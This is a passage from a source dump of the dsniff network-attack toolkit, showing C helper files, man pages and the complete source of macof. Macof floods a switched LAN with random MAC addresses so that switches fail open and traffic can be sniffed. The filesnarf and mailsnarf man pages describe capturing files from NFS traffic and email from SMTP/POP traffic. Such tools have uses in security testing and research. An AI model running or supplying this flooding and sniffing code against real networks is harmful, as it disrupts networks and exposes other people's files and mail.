'{"'"${x%%$'\t'*}"'"'", ${s%%\/*}, DSNIFF_SERVICE_${s##*/}},"; done | column -t >>dsniff_services.h 4 | 5 | struct _ds_service { 6 | char *name; 7 | int port; 8 | char *proto; 9 | }; 10 | 11 | #define DSNIFF_SERVICE_tcp "tcp" 12 | #define DSNIFF_SERVICE_ip "ip" 13 | #define DSNIFF_SERVICE_udp "udp" 14 | #define DSNIFF_SERVICE_rpc "rpc" 15 | static struct _ds_service dsx[] = { 16 | {"ftp", 21, DSNIFF_SERVICE_tcp}, 17 | {"ssh", 22, DSNIFF_SERVICE_tcp}, 18 | {"telnet", 23, DSNIFF_SERVICE_tcp}, 19 | {"smtp", 25, DSNIFF_SERVICE_tcp}, 20 | {"pptp", 47, DSNIFF_SERVICE_ip}, 21 | {"http", 80, DSNIFF_SERVICE_tcp}, 22 | {"ospf", 89, DSNIFF_SERVICE_ip}, 23 | {"http", 98, DSNIFF_SERVICE_tcp}, 24 | {"poppass", 106, DSNIFF_SERVICE_tcp}, 25 | {"pop2", 109, DSNIFF_SERVICE_tcp}, 26 | {"pop3", 110, DSNIFF_SERVICE_tcp}, 27 | {"portmap", 111, DSNIFF_SERVICE_tcp}, 28 | {"portmap", -111, DSNIFF_SERVICE_tcp}, 29 | {"portmap", 111, DSNIFF_SERVICE_udp}, 30 | {"portmap", -111, DSNIFF_SERVICE_udp}, 31 | {"vrrp", 112, DSNIFF_SERVICE_ip}, 32 | {"nntp", 119, DSNIFF_SERVICE_tcp}, 33 | {"smb", 139, DSNIFF_SERVICE_tcp}, 34 | {"imap", 143, DSNIFF_SERVICE_tcp}, 35 | {"snmp", 161, DSNIFF_SERVICE_udp}, 36 | {"imap", 220, DSNIFF_SERVICE_tcp}, 37 | {"telnet", 261, DSNIFF_SERVICE_tcp}, 38 | {"ldap", 389, DSNIFF_SERVICE_tcp}, 39 | {"mmxp", 417, DSNIFF_SERVICE_tcp}, 40 | {"mmxp", 417, DSNIFF_SERVICE_udp}, 41 | {"https", 443, DSNIFF_SERVICE_tcp}, 42 | {"rlogin", 512, DSNIFF_SERVICE_tcp}, 43 | {"rlogin", 513, DSNIFF_SERVICE_tcp}, 44 | {"rlogin", 514, DSNIFF_SERVICE_tcp}, 45 | {"rip", 520, DSNIFF_SERVICE_udp}, 46 | {"smtp", 587, DSNIFF_SERVICE_tcp}, 47 | {"socks", 1080, DSNIFF_SERVICE_tcp}, 48 | {"tds", 1433, DSNIFF_SERVICE_tcp}, 49 | {"tds", 1433, DSNIFF_SERVICE_udp}, 50 | {"citrix", 1494, DSNIFF_SERVICE_tcp}, 51 | {"oracle", 1521, DSNIFF_SERVICE_tcp}, 52 | {"oracle", 1526, DSNIFF_SERVICE_tcp}, 53 | {"sniffer", 2001, DSNIFF_SERVICE_udp}, 54 | {"cvs", 2401, DSNIFF_SERVICE_tcp}, 55 | {"mmxp", 2417, 
DSNIFF_SERVICE_tcp}, 56 | {"mmxp", 2417, DSNIFF_SERVICE_udp}, 57 | {"tds", 2638, DSNIFF_SERVICE_tcp}, 58 | {"http", 3128, DSNIFF_SERVICE_tcp}, 59 | //{"icq", 4000, DSNIFF_SERVICE_udp}, 60 | //{"napster", 4444, DSNIFF_SERVICE_tcp}, 61 | // {"aim", 5190, DSNIFF_SERVICE_tcp}, 62 | {"postgresql", 5432, DSNIFF_SERVICE_tcp}, 63 | // {"napster", 5555, DSNIFF_SERVICE_tcp}, 64 | {"pcanywhere", 5631, DSNIFF_SERVICE_tcp}, 65 | {"x11", 6000, DSNIFF_SERVICE_tcp}, 66 | {"x11", 6001, DSNIFF_SERVICE_tcp}, 67 | {"x11", 6002, DSNIFF_SERVICE_tcp}, 68 | {"x11", 6003, DSNIFF_SERVICE_tcp}, 69 | {"x11", 6004, DSNIFF_SERVICE_tcp}, 70 | {"x11", 6005, DSNIFF_SERVICE_tcp}, 71 | // {"napster", 6666, DSNIFF_SERVICE_tcp}, 72 | {"irc", 6667, DSNIFF_SERVICE_tcp}, 73 | {"irc", 6668, DSNIFF_SERVICE_tcp}, 74 | {"irc", 6669, DSNIFF_SERVICE_tcp}, 75 | {"tds", 7599, DSNIFF_SERVICE_tcp}, 76 | // {"napster", 7777, DSNIFF_SERVICE_tcp}, 77 | {"http", 8080, DSNIFF_SERVICE_tcp}, 78 | // {"napster", 8888, DSNIFF_SERVICE_tcp}, 79 | // {"aim", 9898, DSNIFF_SERVICE_tcp}, 80 | {"pcanywhere", 65301, DSNIFF_SERVICE_tcp}, 81 | {"mountd", 100005, DSNIFF_SERVICE_rpc}, 82 | {"ypserv", 100004, DSNIFF_SERVICE_rpc}, 83 | {"yppasswd", 100009, DSNIFF_SERVICE_rpc} 84 | }; -------------------------------------------------------------------------------- /env2argv.c: -------------------------------------------------------------------------------- 1 | #include "config.h" 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #include "env2argv.h" 8 | 9 | #define ARGS_NAME "ENV_ARGS" 10 | 11 | // Add list of argv's from environment to argv[]. 
12 | // Result: argv[0] + ENV_ARGS[@] + argv[1..n] 13 | void 14 | env2argv(int *argcptr, char **argvptr[]) { 15 | char *str_orig = getenv(ARGS_NAME); 16 | char *str = NULL; 17 | char *next; 18 | char **newargv = NULL; 19 | int newargc = 0; 20 | 21 | if ((str_orig == NULL) || (*str_orig == '\0')) 22 | return; 23 | 24 | str = strdup(str_orig); 25 | next = str; 26 | 27 | newargv = malloc(1 * sizeof *argvptr); 28 | memcpy(&newargv[0], argvptr[0], 1 * sizeof *argvptr); 29 | newargc = 1; 30 | 31 | while (next != NULL) { 32 | while (*str == ' ') 33 | str++; 34 | 35 | next = strchr(str, ' '); 36 | if (next != NULL) { 37 | *next = 0; 38 | next++; 39 | } 40 | // catch if last character is ' ' 41 | if (strlen(str) > 0) { 42 | /* *next == '\0'; str points to argument (0-terminated) */ 43 | newargc++; 44 | // DEBUGF("%d. arg = '%s'\n", newargc, str); 45 | newargv = realloc(newargv, newargc * sizeof newargv); 46 | newargv[newargc - 1] = str; 47 | } 48 | 49 | str = next; 50 | if (str == NULL) 51 | break; 52 | } 53 | 54 | // Copy original argv[1..n] 55 | newargv = realloc(newargv, (newargc + *argcptr) * sizeof newargv); 56 | memcpy(newargv + newargc, *argvptr + 1, (*argcptr - 1) * sizeof *argvptr); 57 | 58 | newargc += (*argcptr - 1); 59 | newargv[newargc] = NULL; 60 | 61 | *argcptr = newargc; 62 | *argvptr = newargv; 63 | } -------------------------------------------------------------------------------- /env2argv.h: -------------------------------------------------------------------------------- 1 | #ifndef __ENV2ARGV_H__ 2 | #define __ENV2ARGV_H__ 1 3 | 4 | void env2argv(int *argcptr, char **argvptr[]); 5 | 6 | #endif /* __ENV2ARGV_H__ */ 7 | -------------------------------------------------------------------------------- /filesnarf.8: -------------------------------------------------------------------------------- 1 | .TH FILESNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | filesnarf 6 | \- 7 | sniff files from NFS traffic 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBfilesnarf\fR 
[\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBfilesnarf\fR saves files sniffed from NFS traffic in the current 17 | working directory. 18 | .SH OPTIONS 19 | .IP "\fB-i \fIinterface\fR" 20 | Specify the interface to listen on. 21 | .IP "\fB-p \fIpcapfile\fR" 22 | Process packets from the specified PCAP capture file instead of the network. 23 | .IP \fB-v\fR 24 | "Versus" mode. Invert the sense of matching, to select non-matching 25 | files. 26 | .IP \fIpattern\fR 27 | Specify regular expression for filename matching. 28 | .IP "\fIexpression\fR" 29 | Specify a tcpdump(8) filter expression to select traffic to sniff. 30 | .SH "SEE ALSO" 31 | dsniff(8), nfsd(8) 32 | .SH AUTHOR 33 | .na 34 | .nf 35 | Dug Song 36 | -------------------------------------------------------------------------------- /hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: hex.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "hex.h" 18 | 19 | int 20 | hex_decode(char *src, int srclen, u_char *dst, int dstlen) 21 | { 22 | char *p, *pe; 23 | u_char *q, *qe, ch, cl; 24 | 25 | pe = src + srclen; 26 | qe = dst + dstlen; 27 | 28 | if (strncmp(src, "0x", 2) == 0) 29 | src += 2; 30 | 31 | for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { 32 | ch = tolower(p[0]); 33 | cl = tolower(p[1]); 34 | 35 | if ((ch >= '0') && (ch <= '9')) ch -= '0'; 36 | else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; 37 | else return (-1); 38 | 39 | if ((cl >= '0') && (cl <= '9')) cl -= '0'; 40 | else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; 41 | else return (-1); 42 | 43 | *q++ = (ch << 4) | cl; 44 | } 45 | return (q - dst); 46 | } 47 | 48 | /* adapted from OpenBSD tcpdump: dump the 
buffer in emacs-hexl format */ 49 | void 50 | hex_print(const u_char *buf, int len, int offset) 51 | { 52 | u_int i, j, jm; 53 | int c; 54 | 55 | printf("\n"); 56 | for (i = 0; i < len; i += 0x10) { 57 | printf(" %04x: ", (u_int)(i + offset)); 58 | jm = len - i; 59 | jm = jm > 16 ? 16 : jm; 60 | 61 | for (j = 0; j < jm; j++) { 62 | if ((j % 2) == 1) printf("%02x ", (u_int) buf[i+j]); 63 | else printf("%02x", (u_int) buf[i+j]); 64 | } 65 | for (; j < 16; j++) { 66 | if ((j % 2) == 1) printf(" "); 67 | else printf(" "); 68 | } 69 | printf(" "); 70 | 71 | for (j = 0; j < jm; j++) { 72 | c = buf[i+j]; 73 | c = isprint(c) ? c : '.'; 74 | printf("%c", c); 75 | } 76 | printf("\n"); 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /hex.h: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.h 3 | * 4 | * Hexadecimal conversion routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: hex.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef HEX_H 12 | #define HEX_H 13 | 14 | int hex_decode(char *src, int srclen, u_char *buf, int len); 15 | 16 | void hex_print(const u_char *buf, int len, int offset); 17 | 18 | #endif /* HEX_H */ 19 | 20 | -------------------------------------------------------------------------------- /macof.8: -------------------------------------------------------------------------------- 1 | .TH MACOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | macof 6 | \- 7 | flood a switched LAN with random MAC addresses 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmacof\fR [\fB-i \fIinterface\fR] [\fB-s \fIsrc\fR] 13 | [\fB-d \fIdst\fR] [\fB-e \fItha\fR] [\fB-x \fIsport\fR] [\fB-y \fIdport\fR] 14 | [\fB-n \fItimes\fR] 15 | .SH DESCRIPTION 16 | .ad 17 | .fi 18 | \fBmacof\fR floods the local network with random MAC addresses 19 | (causing some switches to fail open in repeating mode, facilitating 20 | sniffing). 
A straight C port of the original Perl Net::RawIP macof
program by Ian Vitek .
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to send on.
.IP "\fB-s \fIsrc\fR"
Specify source IP address.
.IP "\fB-d \fIdst\fR"
Specify destination IP address.
.IP "\fB-e \fItha\fR"
Specify target hardware address.
.IP "\fB-x \fIsport\fR"
Specify TCP source port.
.IP "\fB-y \fIdport\fR"
Specify TCP destination port.
.IP "\fB-n \fItimes\fR"
Specify the number of packets to send.
.LP
Values for any options left unspecified will be generated randomly.
.SH "SEE ALSO"
dsniff(8)
.SH AUTHOR
.na
.nf
Dug Song

--------------------------------------------------------------------------------
/macof.c:
--------------------------------------------------------------------------------
/*
 * macof.c
 *
 * C port of macof-1.1 from the Perl Net::RawIP distribution.
 * Tests network devices by flooding local network with MAC-addresses.
 *
 * Perl macof originally written by Ian Vitek .
 *
 * Copyright (c) 1999 Dug Song
 *
 * $Id: macof.c,v 1.15 2001/03/15 08:33:04 dugsong Exp $
 */

#include "config.h"

#include <sys/types.h>
#include <sys/param.h>
#include <netinet/in.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <libnet.h>
#include <pcap.h>


extern char *ether_ntoa(struct ether_addr *);
extern struct ether_addr *ether_aton(char *);

in_addr_t Src = 0;
in_addr_t Dst = 0;
u_char *Tha = NULL;
u_short Dport = 0;
u_short Sport = 0;
char *Intf = NULL;
int Repeat = -1;

static void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
		"Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]"
		"\n [-i interface] [-n times]\n");
	exit(1);
}

static void
gen_mac(u_char *mac)
{
	*((in_addr_t *)mac) = libnet_get_prand(LIBNET_PRu32);
	*((u_short *)(mac + 4)) = libnet_get_prand(LIBNET_PRu16);
}

int
main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;
	int c, i;
	struct libnet_link_int *llif;
	char pcap_ebuf[PCAP_ERRBUF_SIZE];
	char libnet_ebuf[LIBNET_ERRBUF_SIZE];
	u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];
	in_addr_t src, dst;
	u_short sport, dport;
	u_int32_t seq;
	/*
	 * Keep the handle NULL until libnet_init(): option parsing below
	 * passes it to libnet_name2addr4() and must not hand over an
	 * indeterminate pointer.
	 */
	libnet_t *l = NULL;

	while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) {
		switch (c) {
		case 'v':
			break;
		case 's':
			Src = libnet_name2addr4(l, optarg, 0);
			break;
		case 'd':
			Dst = libnet_name2addr4(l, optarg, 0);
			break;
		case 'e':
			Tha = (u_char *)ether_aton(optarg);
			break;
		case 'x':
			Sport = atoi(optarg);
			break;
		case 'y':
			Dport = atoi(optarg);
			break;
		case 'i':
			Intf = optarg;
			break;
		case 'n':
			Repeat = atoi(optarg);
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	if (argc != 0)
		usage();

	if (!Intf && (Intf = pcap_lookupdev(pcap_ebuf)) == NULL)
		errx(1, "%s", pcap_ebuf);

	if ((l = libnet_init(LIBNET_LINK, Intf, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);

	libnet_seed_prand(l);

	for (i = 0; i != Repeat; i++) {

		gen_mac(sha);

		if (Tha == NULL) gen_mac(tha);
		else memcpy(tha, Tha, sizeof(tha));

		if (Src != 0) src = Src;
		else src = libnet_get_prand(LIBNET_PRu32);

		if (Dst != 0) dst = Dst;
		else dst = libnet_get_prand(LIBNET_PRu32);

		if (Sport != 0) sport = Sport;
		else sport = libnet_get_prand(LIBNET_PRu16);

		if (Dport != 0) dport = Dport;
		else dport = libnet_get_prand(LIBNET_PRu16);

		seq = libnet_get_prand(LIBNET_PRu32);

		libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
				 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

		libnet_build_ipv4(LIBNET_TCP_H, 0,
				  libnet_get_prand(LIBNET_PRu16), 0, 64,
				  IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

		libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, l, 0);

		if (libnet_write(l) < 0)
			errx(1, "write");

		libnet_clear_packet(l);

		/* Log the addresses actually written, not the option globals. */
		fprintf(stderr, "%s ",
			ether_ntoa((struct ether_addr *)sha));
		fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n",
			ether_ntoa((struct ether_addr *)tha),
			libnet_addr2name4(src, 0), sport,
			libnet_addr2name4(dst, 0), dport, seq, seq);
	}
	exit(0);
}

--------------------------------------------------------------------------------
/magic.h:
--------------------------------------------------------------------------------
/*
 * magic.h
 *
 * Network application protocol identification, based on file(1) magic.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: magic.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef MAGIC_H
#define MAGIC_H

void magic_init(char *filename);

char *magic_match(u_char *buf, int len);

#endif /* MAGIC_H */

--------------------------------------------------------------------------------
/mailsnarf.8:
--------------------------------------------------------------------------------
.TH MAILSNARF 8
.ad
.fi
.SH NAME
mailsnarf
\-
sniff mail messages in Berkeley mbox format
.SH SYNOPSIS
.na
.nf
.fi
\fBmailsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]]
.SH DESCRIPTION
.ad
.fi
\fBmailsnarf\fR outputs e-mail messages sniffed from SMTP and POP
traffic in Berkeley mbox format, suitable for offline browsing with
your favorite mail reader (mail(1), pine(1), etc.).
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP "\fB-p \fIpcapfile\fR"
Process packets from the specified PCAP capture file instead of the network.
.IP \fB-v\fR
"Versus" mode. Invert the sense of matching, to select non-matching
messages.
.IP \fIpattern\fR
Specify regular expression for message header/body matching.
.IP "\fIexpression\fR"
Specify a tcpdump(8) filter expression to select traffic to sniff.
.SH "SEE ALSO"
dsniff(8), mail(1), pine(1)
.SH AUTHOR
.na
.nf
Dug Song

--------------------------------------------------------------------------------
/missing/dirname.c:
--------------------------------------------------------------------------------
/* $Id: dirname.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */
/* $OpenBSD: dirname.c,v 1.4 1999/05/30 17:10:30 espie Exp $ */

/*
 * Copyright (c) 1997 Todd C. Miller
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
 * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#include <errno.h>
#include <string.h>
#include <sys/param.h>

char *
dirname(path)
	const char *path;
{
	static char bname[MAXPATHLEN];
	register const char *endp;

	/* Empty or NULL string gets treated as "."
	 */
	if (path == NULL || *path == '\0') {
		(void)strcpy(bname, ".");
		return(bname);
	}

	/* Strip trailing slashes */
	endp = path + strlen(path) - 1;
	while (endp > path && *endp == '/')
		endp--;

	/* Find the start of the dir */
	while (endp > path && *endp != '/')
		endp--;

	/* Either the dir is "/" or there are no slashes */
	if (endp == path) {
		(void)strcpy(bname, *endp == '/' ? "/" : ".");
		return(bname);
	} else {
		do {
			endp--;
		} while (endp > path && *endp == '/');
	}

	/*
	 * The copy below is followed by a NUL at index (endp - path + 1),
	 * so that index must stay inside bname: reject a length equal to
	 * sizeof(bname) as well as anything longer.
	 */
	if (endp - path + 1 >= sizeof(bname)) {
		errno = ENAMETOOLONG;
		return(NULL);
	}
	(void)strncpy(bname, path, endp - path + 1);
	bname[endp - path + 1] = '\0';
	return(bname);
}

--------------------------------------------------------------------------------
/missing/dummy.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hackerschoice/dsniff/da38bf437899cc1fbb8d7590a5f62c53a2f411fa/missing/dummy.c

--------------------------------------------------------------------------------
/missing/err.c:
--------------------------------------------------------------------------------
/*
 * err.c
 *
 * Adapted from OpenBSD libc *err* *warn* code.
 *
 * Copyright (c) 2000 Dug Song
 *
 * Copyright (c) 1993
 *	The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <errno.h>

void
err(int eval, const char *fmt, ...)
{
	va_list ap;

	va_start(ap, fmt);
	if (fmt != NULL) {
		(void)vfprintf(stderr, fmt, ap);
		(void)fprintf(stderr, ": ");
	}
	va_end(ap);
	(void)fprintf(stderr, "%s\n", strerror(errno));
	exit(eval);
}

void
warn(const char *fmt, ...)
{
	va_list ap;

	va_start(ap, fmt);
	if (fmt != NULL) {
		(void)vfprintf(stderr, fmt, ap);
		(void)fprintf(stderr, ": ");
	}
	va_end(ap);
	(void)fprintf(stderr, "%s\n", strerror(errno));
}

void
errx(int eval, const char *fmt, ...)
{
	va_list ap;

	va_start(ap, fmt);
	if (fmt != NULL)
		(void)vfprintf(stderr, fmt, ap);
	(void)fprintf(stderr, "\n");
	va_end(ap);
	exit(eval);
}

void
warnx(const char *fmt, ...)
{
	va_list ap;

	va_start(ap, fmt);
	if (fmt != NULL)
		(void)vfprintf(stderr, fmt, ap);
	(void)fprintf(stderr, "\n");
	va_end(ap);
}

--------------------------------------------------------------------------------
/missing/err.h:
--------------------------------------------------------------------------------
/*
 * err.h
 *
 * Adapted from OpenBSD libc *err* *warn* code.
 *
 * Copyright (c) 2000 Dug Song
 *
 * Copyright (c) 1993
 *	The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *	@(#)err.h 8.1 (Berkeley) 6/2/93
 */

#ifndef _ERR_H_
#define _ERR_H_

void err(int eval, const char *fmt, ...);
void warn(const char *fmt, ...);
void errx(int eval, const char *fmt, ...);
void warnx(const char *fmt, ...);

#endif /* !_ERR_H_ */

--------------------------------------------------------------------------------
/missing/ethers.c:
--------------------------------------------------------------------------------
/* $Id: ethers.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */
/* $OpenBSD: ethers.c,v 1.10 1998/11/18 23:28:54 deraadt Exp $ */

/*
 * Copyright (c) 1998 Todd C. Miller
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
 * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * ethers(3) a la Sun.
 * Originally Written by Roland McGrath 10/14/93.
 * Substantially modified by Todd C. Miller
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

char *
ether_ntoa(e)
	struct ether_addr *e;
{
	static char a[] = "xx:xx:xx:xx:xx:xx";

	if (e->ether_addr_octet[0] > 0xFF || e->ether_addr_octet[1] > 0xFF ||
	    e->ether_addr_octet[2] > 0xFF || e->ether_addr_octet[3] > 0xFF ||
	    e->ether_addr_octet[4] > 0xFF || e->ether_addr_octet[5] > 0xFF) {
		errno = EINVAL;
		return (NULL);
	}

	(void)sprintf(a, "%02x:%02x:%02x:%02x:%02x:%02x",
	    e->ether_addr_octet[0], e->ether_addr_octet[1],
	    e->ether_addr_octet[2], e->ether_addr_octet[3],
	    e->ether_addr_octet[4], e->ether_addr_octet[5]);

	return (a);
}

static char *
_ether_aton(s, e)
	char *s;
	struct ether_addr *e;
{
	int i;
	long l;
	char *pp;

	/* ctype functions need an unsigned char value, not a plain char. */
	while (isspace((unsigned char)*s))
		s++;

	/* expect 6 hex octets separated by ':' or space/NUL if last octet */
	for (i = 0; i < 6; i++) {
		l = strtol(s, &pp, 16);
		if (pp == s || l > 0xFF || l < 0)
			return (NULL);
		if (!(*pp == ':' || (i == 5 && (isspace((unsigned char)*pp) || *pp == '\0'))))
			return (NULL);
		e->ether_addr_octet[i] = (u_char)l;
		s = pp + 1;
	}

	/* return character after the octets ala strtol(3) */
	return (pp);
}

struct ether_addr *
ether_aton(s)
	char *s;
{
	static struct ether_addr n;

	return (_ether_aton(s, &n) ? &n : NULL);
}

--------------------------------------------------------------------------------
/missing/libgen.h:
--------------------------------------------------------------------------------
/*
 * libgen.h
 *
 * Adapted from OpenBSD libc *err* *warn* code.
 *
 * Copyright (c) 2000 Dug Song
 *
 * Copyright (c) 1997 Todd C. Miller
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
